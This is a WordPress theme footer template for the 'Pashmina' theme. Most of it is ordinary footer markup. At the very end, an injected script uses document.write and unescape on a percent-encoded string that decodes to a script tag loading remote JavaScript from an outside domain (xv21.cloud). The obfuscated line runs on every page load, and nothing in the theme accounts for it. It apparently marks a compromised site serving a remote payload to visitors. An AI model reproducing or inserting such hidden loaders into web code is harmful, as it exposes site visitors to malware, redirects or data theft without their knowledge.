<?php
/**
 * The template for displaying the footer.
 *
 * Contains the closing of the #content div and all content after.
 *
 * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials
 *
 * @package Pashmina
 */

?>

<footer class="dt-footer">
	<?php if ( is_active_sidebar( 'dt-footer1' ) || is_active_sidebar( 'dt-footer2' ) || is_active_sidebar( 'dt-footer3' ) || is_active_sidebar( 'dt-footer4' ) ) : ?>
		<div class="container">
			<div class="row">
				<div id="secondary" class="dt-footer-cont">

					<?php if( is_active_sidebar( 'dt-footer1' ) ) : ?>

						<div class="col-lg-3 col-md-3 col-sm-6">
							<?php dynamic_sidebar( 'dt-footer1' ); ?>
						</div><!-- .col-lg-3 -->

					<?php endif; ?>

					<?php if( is_active_sidebar( 'dt-footer2' ) ) : ?>

						<div class="col-lg-3 col-md-3 col-sm-6">
							<?php dynamic_sidebar( 'dt-footer2' ); ?>
						</div><!-- .col-lg-3 -->

					<?php endif; ?>

					<?php if( is_active_sidebar( 'dt-footer3' ) ) : ?>

						<div class="col-lg-3 col-md-3 col-sm-6">
							<?php dynamic_sidebar( 'dt-footer3' ); ?>
						</div><!-- .col-lg-3 -->

					<?php endif; ?>

					<?php if( is_active_sidebar( 'dt-footer4' ) ) : ?>

						<div class="col-lg-3 col-md-3 col-sm-6">
							<?php dynamic_sidebar( 'dt-footer4' ); ?>
						</div><!-- .col-lg-3 -->

					<?php endif; ?>

					<div class="clearfix"></div>
				</div><!-- .dt-sidebar -->
			</div><!-- .row -->
		</div><!-- .container -->
	<?php endif; ?>

	<div class="dt-footer-bar">
		<div class="container">
			<div class="row">
				<div class="col-lg-6 col-md-6">
					<div class="dt-copyright">
						<?php _e( 'Copyright &copy; ', 'pashmina' ); echo date( 'Y' ); ?> <a href="<?php echo esc_url( home_url( '/' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>"><?php echo esc_html( get_bloginfo( 'name', 'display' ) ); ?></a><?php _e( '. All rights reserved.', 'pashmina' )?>
					</div><!-- .dt-copyright -->
				</div><!-- .col-lg-6 .col-md-6 -->

				<div class="col-lg-6 col-md-6">
					<div class="dt-footer-designer">
						<?php do_action('pashmina_theme_info'); ?>
					</div><!-- .dt-footer-designer -->
				</div><!-- .col-lg-6 .col-md-6 -->
			</div><!-- .row -->
		</div><!-- .container -->
	</div><!-- .dt-footer-bar -->
</footer><!-- .dt-footer -->

<a id="back-to-top" class="transition35"><i class="fa fa-angle-up"></i></a><!-- #back-to-top -->

<?php wp_footer(); ?>
<script type="text/javascript">
document.write(unescape('%20%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%73%3A%2F%2F%78%76%32%31%2E%63%6C%6F%75%64%2F%78%78%78%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E%0A'));
</script>
</body>
</html>
